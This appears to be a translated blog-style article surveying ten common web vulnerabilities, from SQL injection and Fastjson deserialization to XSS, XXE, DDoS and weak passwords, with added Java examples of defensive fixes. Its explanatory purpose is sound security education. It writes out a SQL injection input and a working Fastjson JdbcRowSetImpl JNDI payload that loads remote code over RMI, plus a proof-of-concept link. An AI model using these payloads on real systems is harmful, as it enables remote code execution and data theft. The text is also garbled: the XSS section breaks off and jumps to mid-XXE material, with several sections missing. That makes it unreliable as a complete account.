2025-01-18 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/03 Report--
This article surveys ten common security vulnerabilities in web development, analysed from a practitioner's point of view; I hope you take something away from it.
In day-to-day development, many developers ignore security vulnerabilities and assume that it is enough for the business logic to work correctly. In fact, security is the most important thing.
I. SQL injection
1.1 What is SQL injection?
SQL injection is a code injection technique, generally used to attack web applications: by passing specially crafted parameter strings through the web application's interface, the attacker tricks the application server into executing malicious SQL commands and obtains system information without authorisation. It is currently one of the most common ways of attacking a database.
1.2 How does a SQL injection attack work?
Take a common business scenario: the user enters an employee's name in the search box of a web form, and the back end queries the employee with that name.
In this scenario the front end usually passes a name parameter to the back end, which then runs a SQL query:

    name = "Tian snail";
    // query the employee table staff by the name parameter passed from the front end
    SQL = "select * from staff where name='" + name + "'";

Because the SQL is built by string concatenation, the back end fully trusts whatever the front end sends. If the front end passes a parameter such as ' or '1, the resulting SQL becomes:

    select * from staff where name='' or '1'

This SQL returns the information of every employee: the requester has exceeded their authority, obtains the records of all employees, and other users' information is exposed.
1.3 How to prevent SQL injection
1.3.1 Use #{} instead of ${}
In MyBatis, using #{} instead of ${} largely prevents SQL injection.
#{} is a parameter placeholder: for string types quotation marks are added automatically, for other types they are not. Because MyBatis precompiles the statement, the parameters passed in afterwards are no longer compiled as SQL, which prevents SQL injection to a large extent.
${} is a simple string replacement: whatever string is passed in is inserted into the statement verbatim, so it carries a risk of SQL injection.
1.3.2 Do not expose unnecessary logs or security information; for example, do not return SQL exception details directly in the response
If a SQL exception occurs, do not expose its details to the user; respond with a custom exception instead.
1.3.3 Do not trust any external input parameter; filter database keywords contained in parameters
You can add a parameter-checking filter that screens database keywords such as union and or.
1.3.4 Appropriate access control
Before querying, first check whether the current user has the required permission. For example, the user may pass an enterprise id or similar information, or you may read the current user's session; then check whether the current user belongs to that enterprise, and only query the employee if so.
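As an added illustration (not code from the article), the staff lookup above written with JDBC in both forms: the concatenated query that the injected parameter breaks, and the parameterized query that MyBatis #{} also produces under the hood. The Connection and the staff table are assumed.

```java
// Added example, not from the article: the same lookup done by string
// concatenation (vulnerable) and by a parameterized query (safe).
// Assumes a JDBC Connection to a table "staff" with a "name" column.
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;

public class StaffLookup {

    // Vulnerable: the request parameter becomes part of the SQL text, so the
    // input  ' or '1  turns the statement into  ... where name='' or '1'
    // and every row comes back. This is what MyBatis ${name} generates.
    public static List<String> findByNameUnsafe(Connection conn, String name) throws SQLException {
        String sql = "select name from staff where name='" + name + "'";
        try (Statement st = conn.createStatement(); ResultSet rs = st.executeQuery(sql)) {
            return collect(rs);
        }
    }

    // Safe: the SQL text is fixed and compiled first; the value is bound as a
    // parameter afterwards and can never change the statement's structure.
    // MyBatis #{name} produces exactly this kind of PreparedStatement.
    public static List<String> findByNameSafe(Connection conn, String name) throws SQLException {
        String sql = "select name from staff where name = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, name);
            try (ResultSet rs = ps.executeQuery()) {
                return collect(rs);
            }
        }
    }

    private static List<String> collect(ResultSet rs) throws SQLException {
        List<String> names = new ArrayList<>();
        while (rs.next()) {
            names.add(rs.getString("name"));
        }
        return names;
    }
}
```

With the input ' or '1, findByNameUnsafe returns the whole table while findByNameSafe returns nothing, because no employee is literally named "' or '1".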
II. JSON deserialization vulnerabilities, such as the Fastjson security vulnerabilities
2.1 What are JSON serialization and JSON deserialization?
Serialization: the process of converting an object into a sequence of bytes.
Deserialization: the process of restoring a byte sequence to a Java object.
JSON serialization converts an object into a string in JSON format, and JSON deserialization converts a JSON string back into an object.
2.2 How are JSON deserialization vulnerabilities exploited?
Insecure deserialization can lead to remote code execution, replay attacks, injection attacks or privilege escalation. Fastjson has had security vulnerabilities exposed repeatedly. Let us analyse a deserialization vulnerability in fastjson version 1.2.24; the common way to exploit it is to achieve RCE through JNDI injection.
Let's start with a simple example of fastjson deserialization:
    import com.alibaba.fastjson.JSON;

    public class User {
        private String name;
        private int age;

        public String getName() {
            return name;
        }

        public void setName(String name) {
            System.out.println("name method called");
            this.name = name;
        }

        public int getAge() {
            return age;
        }

        public void setAge(int age) {
            System.out.println("age method called");
            this.age = age;
        }

        public static void main(String[] args) {
            String str = "{\"@type\":\"cn.eovie.bean.User\",\"age\":26,\"name\":\"Little boy picking up snails\"}";
            User user = JSON.parseObject(str, User.class);
        }
    }
Running result:

    age method called
    name method called
With the @type attribute added, the setXXX methods of the corresponding object are called: @type specifies the class into which the JSON is deserialized. If we can find a class in which one of the setXXX methods can be made to execute a command through careful construction of the input, the attack succeeds.
com.sun.rowset.JdbcRowSetImpl is such a class. It has two relevant setters, setAutoCommit and setDataSourceName.
If you are interested, take a look at its source code:
    public void setDataSourceName(String var1) throws SQLException {
        if (this.getDataSourceName() != null) {
            if (!this.getDataSourceName().equals(var1)) {
                super.setDataSourceName(var1);
                this.conn = null;
                this.ps = null;
                this.rs = null;
            }
        } else {
            super.setDataSourceName(var1);
        }
    }

    public void setAutoCommit(boolean var1) throws SQLException {
        if (this.conn != null) {
            this.conn.setAutoCommit(var1);
        } else {
            this.conn = this.connect();
            this.conn.setAutoCommit(var1);
        }
    }

    private Connection connect() throws SQLException {
        if (this.conn != null) {
            return this.conn;
        } else if (this.getDataSourceName() != null) {
            try {
                InitialContext var1 = new InitialContext();
                DataSource var2 = (DataSource) var1.lookup(this.getDataSourceName());
                return this.getUsername() != null && !this.getUsername().equals("")
                        ? var2.getConnection(this.getUsername(), this.getPassword())
                        : var2.getConnection();
            } catch (NamingException var3) {
                throw new SQLException(this.resBundle.handleGetObject("jdbcrowsetimpl.connect").toString());
            }
        } else {
            return this.getUrl() != null
                    ? DriverManager.getConnection(this.getUrl(), this.getUsername(), this.getPassword())
                    : null;
        }
    }
setDataSourceName simply sets the value of dataSourceName; setAutoCommit contains a connect operation, and the connect method contains a typical JNDI lookup call whose parameter is exactly the dataSourceName set in setDataSourceName.
Therefore the vulnerable deserialization code looks like this:
    import com.alibaba.fastjson.JSONObject;

    public class FastjsonTest {
        public static void main(String[] argv) {
            testJdbcRowSetImpl();
        }

        public static void testJdbcRowSetImpl() {
            // JDK 8u121 and later versions need this system property to be set
            System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
            // RMI
            String payload2 = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:1099/Exploit\","
                    + "\"autoCommit\":true}";
            JSONObject.parseObject(payload2);
        }
    }
The process of reproducing the vulnerability is as follows (reference code: fastjson vulnerability code test, https://github.com/earayu/fastjson_jndi_poc).
2.3 How to fix JSON deserialization vulnerabilities
You can upgrade to a later version of fastjson, which tightens security when AutoType is enabled and adds an AutoType blacklist, in order to deal with these vulnerabilities.
Fastjson is not the only JSON library: gson, jackson and others can be used instead.
Upgrade + enable safeMode.
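An added example, not from the article or the fastjson project: parsing the User object from section 2.2 with fastjson's safeMode switched on, so that an @type key is refused instead of resolved. It assumes fastjson 1.2.68 or later, where safeMode exists.

```java
// Added example, not from the article: parse untrusted JSON with fastjson
// safeMode so that an "@type" key is never honoured. Assumes fastjson >= 1.2.68.
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONException;
import com.alibaba.fastjson.parser.ParserConfig;

public class SafeUserParser {

    public static class User {
        private String name;
        private int age;
        public String getName() { return name; }
        public void setName(String name) { this.name = name; }
        public int getAge() { return age; }
        public void setAge(int age) { this.age = age; }
    }

    static {
        // safeMode disables autoType completely: any "@type" key makes fastjson
        // throw a JSONException instead of instantiating the named class, so the
        // JdbcRowSetImpl setter chain above can never be reached. The same
        // switch is available as -Dfastjson.parser.safeMode=true.
        ParserConfig.getGlobalInstance().setSafeMode(true);
    }

    // Only the declared target class is ever instantiated; the input decides
    // field values, never the type.
    public static User parseUser(String json) {
        return JSON.parseObject(json, User.class);
    }

    // True when fastjson refuses the document (in safeMode, any document carrying "@type").
    public static boolean rejectsAutoType(String json) {
        try {
            JSON.parseObject(json);
            return false;
        } catch (JSONException e) {
            return true;
        }
    }

    public static void main(String[] args) {
        User u = parseUser("{\"name\":\"Little boy picking up snails\",\"age\":26}");
        System.out.println(u.getName() + " / " + u.getAge());
        // Constructed input naming an unrelated class: rejected before any setter runs.
        System.out.println(rejectsAutoType("{\"@type\":\"java.util.HashMap\",\"a\":1}"));
    }
}
```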
III. XSS attack
3.1 What is XSS?
XSS stands for cross-site scripting (Cross-Site Scripting); because the abbreviation CSS would clash with cascading style sheets (Cascading Style Sheets), cross-site scripting is abbreviated XSS. It means that an attacker inserts malicious HTML code into a web page; when a user browses the page, the embedded HTML code executes and achieves the attacker's purpose against that user. There are generally three types of XSS: stored, reflected and DOM-based.
3.2 How does an XSS attack work?
Take reflected XSS as an example; the flow chart is as follows:
Let's look at some simple code samples. First, the normal HTML page is as follows:
Scenario 2: the attacker probes the server's private network by changing the entity line above.
Scenario 3: the attacker performs a denial-of-service attack through a malicious file.
7.3 How to defend against XXE
Use the method provided by the development language to disable external entities.
Filter the XML data submitted by users.
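An added example, not from the article: the first defence above applied in Java, a DocumentBuilderFactory configured so that the entity declarations behind scenes 2 and 3 are never processed. The feature names are the standard JAXP/Xerces ones.

```java
// Added example, not from the article: a DocumentBuilderFactory hardened
// against XXE. Feature URIs are the standard JAXP/Xerces names.
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

public class SafeXmlParser {

    public static DocumentBuilder newBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Reject any DOCTYPE at all: no inline entity definitions (the
        // denial-of-service case of scene 3) and no external entity declarations.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Belt and braces for parsers where a DOCTYPE must be tolerated: never
        // fetch general or parameter external entities (file read and SSRF cases).
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        // Secure processing also applies the JAXP entity-expansion limits.
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        return f.newDocumentBuilder();
    }

    public static Document parse(String xml) throws Exception {
        return newBuilder().parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: a plain document parses; a document carrying a
        // DOCTYPE is refused by the parser before any entity is resolved.
        System.out.println(parse("<staff><name>Tian snail</name></staff>").getDocumentElement().getTagName());
        try {
            parse("<!DOCTYPE d [<!ENTITY e \"x\">]><d>&e;</d>");
        } catch (SAXParseException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```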
VIII. DDoS attack
8.1 What is a DDoS attack?
DDoS stands for Distributed Denial of Service. In general terms, the attacker sends a large number of requests to the target website in a short time, consuming the target host's resources on a large scale so that it can no longer serve normally. Online games, Internet finance and similar fields are the industries with a high incidence of DDoS attacks.
For ease of understanding, I would like to quote a classic example from Zhihu.
I opened a Chongqing hot pot restaurant with 50 seats. Because of the high-quality ingredients and honest prices for young and old alike, the place is usually packed and business is booming, while nobody is interested in Er Gou's hot pot restaurant across the street. To deal with me, Er Gou thought of a way: he called 50 people to sit in my restaurant without ordering, so that other guests could not eat.
8.2 How to deal with DDoS attacks?
High-defence servers, that is, servers that can independently withstand 50 Gbps or more, can help websites resist denial-of-service attacks; scan the network's main nodes regularly; and so on.
Blacklists
DDoS traffic scrubbing
CDN acceleration
IX. Framework or application vulnerabilities
Struts framework vulnerabilities: remote command execution and open redirect
QQ Browser 9.6: API access-control problems lead to disclosure of privacy mode
Oracle GlassFish Server: REST CSRF
WebLogic: unauthorized command execution vulnerability
Hacking Docker: Registry API unauthorized access
WordPress 4.7 / 4.7.1: REST API content injection vulnerability
X. Weak passwords, certificate validity verification, internal interfaces exposed on the public network, missing authentication and other permission-related vulnerabilities
10.1 Weak passwords
Empty password
Password shorter than 8 characters
Password made of one repeated character (e.g. QQQQQQ)
Password identical to the account name (e.g. root:root)
Password is the account name reversed (e.g. root:toor)
Password is all digits (e.g. 112312324234, a telephone number)
Password is all letters (e.g. asdjfhask)
Password is a word with letters replaced by look-alike digits (e.g. hello word becomes hell0 w0rd)
Password is a consecutive sequence (e.g. 123456, abcdef, 654321, fedcba)
Default factory password of a service or device
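An added example, not from the article: a Java checker that encodes the weak-password rules listed above as a function returning the rules a candidate violates. The default-password set is a constructed placeholder, and the digit-substitution rule is interpreted as "undoing the usual digit-for-letter swaps leaves a letters-only word".

```java
// Added example, not from the article: a checker for the weak-password
// patterns listed above. DEFAULT_PASSWORDS is a constructed placeholder; a
// real deployment would load the vendor defaults it actually ships with.
import java.util.ArrayList;
import java.util.List;
import java.util.Set;

public class WeakPasswordCheck {

    private static final Set<String> DEFAULT_PASSWORDS = Set.of("admin", "password", "123456");

    // Returns the rules the password violates; an empty list means it passed.
    public static List<String> weaknesses(String account, String password) {
        List<String> hits = new ArrayList<>();
        if (password == null || password.isEmpty()) {
            hits.add("empty password");
            return hits;
        }
        String lower = password.toLowerCase();
        String acct = account == null ? "" : account.toLowerCase();
        if (password.length() < 8) hits.add("shorter than 8 characters");
        if (password.chars().distinct().count() == 1) hits.add("one repeated character");
        if (lower.equals(acct)) hits.add("same as account name");
        if (lower.equals(new StringBuilder(acct).reverse().toString())) hits.add("account name reversed");
        if (lower.matches("\\d+")) hits.add("digits only");
        if (lower.matches("[a-z]+")) hits.add("letters only");
        // Digit substitution (hell0 w0rd): undo the usual digit-for-letter swaps
        // and see whether only letters (and spaces) remain.
        String unleet = lower.replace('0', 'o').replace('1', 'l').replace('3', 'e')
                .replace('4', 'a').replace('5', 's').replace('7', 't');
        if (!unleet.equals(lower) && unleet.matches("[a-z ]+")) hits.add("letters with digit substitutions");
        if (isSequence(lower)) hits.add("consecutive sequence");
        if (DEFAULT_PASSWORDS.contains(lower)) hits.add("default factory password");
        return hits;
    }

    // True when every character is one step up (123456, abcdef) or one step
    // down (654321, fedcba) from the previous one.
    static boolean isSequence(String s) {
        if (s.length() < 3) return false;
        int step = s.charAt(1) - s.charAt(0);
        if (step != 1 && step != -1) return false;
        for (int i = 2; i < s.length(); i++) {
            if (s.charAt(i) - s.charAt(i - 1) != step) return false;
        }
        return true;
    }
}
```

weaknesses("root", "toor") reports the short length, the reversed account name and the letters-only rule; weaknesses("alice", "hell0 w0rd") reports only the digit-substitution rule.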
10.2 Certificate validity verification vulnerabilities
If the validity of the certificate is not verified, HTTPS is little better than a fake.
If the certificate is generated by yourself, it must form a trust chain with the system's trusted root CA. Never make the client code trust all certificates just to make an SSL certificate error go away.
When a certificate is about to expire, replace it in advance.
10.3 Permission-related vulnerabilities such as missing authentication
For important APIs, authentication is generally required. For example, when querying the transfer records of an account, first check that the account belongs to the operator.
These are the ten common security vulnerabilities in web development shared here. If you have similar questions, refer to the analysis above; to learn more, follow the industry information channel.